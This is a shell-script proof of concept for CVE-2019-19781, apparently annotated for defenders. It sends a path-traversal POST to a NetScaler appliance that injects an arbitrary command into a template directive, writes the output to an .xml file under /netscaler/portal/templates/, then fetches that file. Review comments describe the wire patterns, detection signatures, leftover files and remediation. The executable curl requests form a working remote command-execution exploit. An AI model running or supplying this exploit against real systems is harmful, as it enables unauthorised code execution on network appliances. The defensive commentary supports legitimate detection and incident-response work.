- #!/bin/ash
# Proof-of-concept client for CVE-2019-19781, kept exactly as posted (the
# leading list markers come from the paste rendering). Usage per the script
# itself: ash CVE-2019-19781.sh IP CMD
#   $1 - host placed into every https:// URL below
#   $2 - command string embedded into the POST body
# Review comments are written for defenders: what the three requests look like
# on the wire and what they leave behind on a target appliance.
- echo "--------------------------------------------
- ███████╗██████╗ ██╗ ██╗███╗ ██╗██████╗
- ██╔════╝██╔══██╗██║ ██║████╗ ██║██╔══██╗
- ███████╗██████╔╝██║ █╗ ██║██╔██╗ ██║██║ ██║
- ╚════██║██╔═══╝ ██║███╗██║██║╚██╗██║██║ ██║
- ███████║██║ ╚███╔███╔╝██║ ╚████║██████╔╝
- ╚══════╝╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝
- --------------------------------------------"
# Argument check: only $1 is tested for emptiness. A missing $2 is not
# rejected, and the bare exit below returns the status of the preceding echo
# (normally 0) rather than an error code.
- if [ -z "$1" ];
- then
- echo -ne 'Usage : ash CVE-2019-19781.sh IP CMD\n'
- exit;
- fi
# Random 32-character alphanumeric name read from /dev/urandom and reused as
# the file name in all three requests. It differs on every run, so the name is
# not a stable indicator; the directory and the .xml extension are.
- filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
# Request 1: a POST (because of -d) to /vpns/portal/scripts/newbm.pl, reached
# through the /vpn/../vpns/ path. --path-as-is stops curl from collapsing the
# /../ segment before sending, so the traversal appears verbatim in the request
# line. --insecure and -k are the same option: certificate verification is off.
# The body embeds $2 in a template directive that pipes its output through tee
# into /netscaler/portal/templates/<name>.xml, and the NSC_USER header carries
# a ../ traversal to that same directory.
# $1 and $2 are interpolated into the URL and body without any encoding.
# Detection: alert on request paths containing /vpn/../vpns/, on POSTs to
# newbm.pl, and on NSC_USER values containing ../ sequences. The constant
# spwnd11 header value identifies this script only and is trivially changed,
# so do not rely on it as the sole signature.
- curl --insecure -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: spwnd11' -H 'Content-type:
- application/x-www-form-urlencoded' --path-as-is
# Request 2: a GET for /vpns/portal/<name>.xml through the same traversal path,
# silent (-s) and limited to 3 seconds (-m 3). Its response is printed before
# the Command Output label below.
# NOTE(review): presumably this path is served from the templates directory
# named in request 1 - confirm against vendor documentation.
- echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
- echo -ne "Command Output :\n"
# Request 3: the same GET again, this time without -s.
# No request in this listing removes the .xml file afterwards. Incident
# responders should check /netscaler/portal/templates/ for unexpected .xml
# files and correlate their timestamps with the request patterns above.
# Remediation is the vendor fix or mitigation for CVE-2019-19781; filtering on
# the header strings used here is not sufficient.
- curl --insecure -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is